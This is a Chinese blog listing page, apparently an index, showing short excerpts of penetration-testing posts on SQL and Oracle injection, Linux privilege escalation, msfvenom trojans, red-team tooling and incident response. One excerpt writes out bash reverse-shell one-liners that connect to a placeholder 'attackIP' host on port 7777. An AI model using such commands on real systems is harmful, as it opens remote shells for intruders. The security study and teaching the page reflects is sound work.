台部落逝之君

0x00前言如果我們要面試一個滲透測試工程師，其中一些經典的問題是必要會被問到的，所以本文就這些方面進行一個比較基礎的總結，希望這些總結會對大家面試有所幫助。更重要的是，本文將非常非常具體地分析每一個步驟、所需的工具、思路等等

2020-07-05 01:36:05

原來一直不知道oracle注入可以你拿shell，特意記錄下以下的演示都是在web上的sql plus執行的，在web注入時把select SYS.DBMS_EXPORT_EXTENSION.....改成　　/xxx.jsp?

2020-07-05 01:36:05

這次測試遇到了些問題，踩了一些坑，爲後來者記。本次測試遇到的主要問題是服務端要驗證sign值，sign值由sha1(salt+post data)生成，我如果要更改post data進行測試的話，就必須更新s

2020-07-05 01:35:55

方法一利用JRMPClient 反彈shell方式 Bash： bash -i >& /dev/tcp/attackIP/7777 0>&1 /bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1

2020-07-05 01:35:55

本文持續更新。爲SQL注入攻擊與防禦第二版讀後感第一章 SQL注入產生過程： 1.字符處理不當 '作爲分界線。 2.類型處理不當數字型，沒加單引號，直接可繼續執行命令。 LOAD_FILE， SELECT

2020-07-05 01:35:55

想到什麼就隨手寫點吧，最近剛看完《Android軟件安全與逆向分析》。另外還有一本《Android應用安全防護和逆向分析》，準備開始看。兩本書的PDF鏈接我會放在末尾，需要的自取。《Android軟件安全與逆向分析》書中提到了多種

2020-07-05 01:35:55

在做wechat爬蟲時遇到的問題，整理記錄下： 1.selenium與firefox版本不匹配：報錯爲： selenium.common.exceptions.WebDriverException: Message: Can't lo

2020-03-11 09:05:07

這篇講一些關於 Linux 提權的方法，也是參考網上的一些提權方式，對於剛接觸 Linux 提權的夥伴來說，需要花不少時間去理解，所以這裏是以個人通俗易懂的思路去寫，希望能幫到熱愛學習的朋友，先寫這些提權方法。若有更好的提權方式，歡迎老哥

2020-02-22 00:58:47

因自身需要轉載，當工具書使用：轉載自http://www.cnblogs.com/r00tuser/p/7252796.html 前言在早之前我對於tamper的使用一直都是停留在錯誤的思維。想着bypass，應該要先手動fu

2020-02-20 21:49:42

因爲研究需要，特將過程進行記錄： 0X01 添加kali rolling官方源我這裏將原來的源全部註釋了，僅使用了kali的rolling官方源： vi /etc/apt/sources.list [html] vie

2020-02-20 21:49:42

Red Teaming / Adversary Simulation Toolkit 內容偵察武器化交貨命令與控制橫向運動建立立足點升級特權數據泄露雜項參考偵察主動情報收集 EyeWitness：可用於網站截圖，以

2020-02-20 21:49:42

#coding:utf-8 import re import requests import Queue import threading import pymongo from config import * from urllib

2020-02-20 21:49:42

0x00 前言在我們日常運維中，難免有幾個網站或者主機被入侵，這時就出現應急響應需求。那麼我們應該怎樣着手分析暱？本文將爲你細細道來，其中由於都是文字描述思路，所以各位要有耐心讀完全文。但是這個思路分析講解得非常詳細，按部就班，一步一步

2020-02-20 21:49:42

轉載自 csdn：憶蓉之心簡介它是一個免費的、可下載的框架，通過它可以很容易地獲取、開發並對計算機軟件漏洞實施攻擊。它本身附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。環境工具：msf4 僞裝木馬原理：msfvenom是msfp

2020-02-20 21:49:42

轉載自：https://github.com/We5ter/Scanners-Box Scanners Box是一個集合github平臺上的安全行業從業者自研開源掃描器的倉庫，包括子域名枚舉、數據庫漏洞掃描、弱口令或信息泄漏掃描、端口

2020-02-20 21:49:42